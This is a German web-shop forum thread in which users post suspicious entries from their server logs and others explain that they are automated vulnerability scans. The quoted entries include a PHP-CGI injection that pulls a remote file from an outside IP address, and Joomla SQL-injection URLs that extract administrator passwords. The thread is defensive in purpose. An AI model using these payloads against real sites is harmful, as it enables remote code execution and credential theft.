Da will Dich jemand hacken http://www.securityweek.com/hacked-mit-server-used-stage-attacks-scan-vulnerabilities
Als URL auch nicht schlecht: ?-dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F61.19.253.26%252Fecho.txt
Haben wir auch gerade ohne Ende, mehrfach am Tag: /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt Ist wohl wieder eine größer angelegte Brute Force Attacke? Gibt es irgendeinen PHP Bug von dem wir wissen sollten und der gerade großflächig ausgenutzt wird? Macht es Sinn, sowas per htacess komplett auszuschließen?
Wie sieht es hiermit aus wenn sowas drin steht? Hat sich da jemand fremdes eingeloggt? /admin/../login.php
So lange sowas noch da steht ist nichts passiert. Wenn jemand reinkommt, wird er in der whos online gar nicht aufgeführt. Sowas sind ganz häufig Bots die vorgeschickt werden um alte bekannte Sicherheitslücken von Standardsoftware auszutesten. Das muss nicht einmal ein gezielter Angriff auf deinen Shop oder auch nicht gezielt ein Angriff auf das Gambia Shopsystem sein.
Schon mehrfach hier erwähnt und m.E. immer noch gut - siehe hier.. Seit 01.01.13: 28958 mehrkwürdige Besuche abgefangen!
Bei "wer ist online" steht: /HNAP1/ 64.141.162.75 Die gleiche IP steht auch bei: "Logs anzeigen" mehrmals drin. Ist das ein Grund zur beunruhigung oder ist das normal? Ups das war jetzt die verkehrte Grafik aber diese beunruhigt mich auch.
auf dem Bild sind einfach spider die sicherheitslücken suchen durch bekannte programme in standardordnern versuchen reinzukommen. das hat man ständig. is normal nciht schlimm wenn man solche programme nciht hat. ich installier z.b. software auch aus solchen gründen nie in die standard ordner.
Bei mir ist seit ein paar Tagen immer mal wieder für kurze Zeit jemand mit IP aus der Ukraine aktiv, u.a. mit: /index.php?option=com_simplefaq&task=answer&itemid=9999&catid=9999&aid=-1+union+select+0,concat(0x217e,password,0x3a,username,0x3a,usertype,0x7e21),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+%23__users+where+gid=25+or+gid=24-- /index.php?option=com_properties&task=agentlisting&aid=-1+union+select+1,2,3,4,concat(0x217e,password,0x3a,username,0x3a,usertype,0x7e21),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+%23__users+where+gid=25+or+gid=24-- oder zuletzt: /index.php?option=com_akobook&itemid=36&func=sign&action=reply&gbid=-1+union+select+1,2,concat(0x217e,password,0x3a,username,0x3a,usertype,0x7e21),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+%23__users+where+gid=25+or+gid=24-- Ist das hoffentlich auch harmlos? Kann mich jemand beruhigen?
Das sind automatisierte Tests von Hackern auf Sicherheitslücken für die CMS Software Joomla. Nicht zielgerichtet auf deinen Shop, sondern einfach mal bei ein paar Hunderttausend Seiten testen ob was geht. Die können damit bei Gambio nichts erreichen => Beruhigung genug?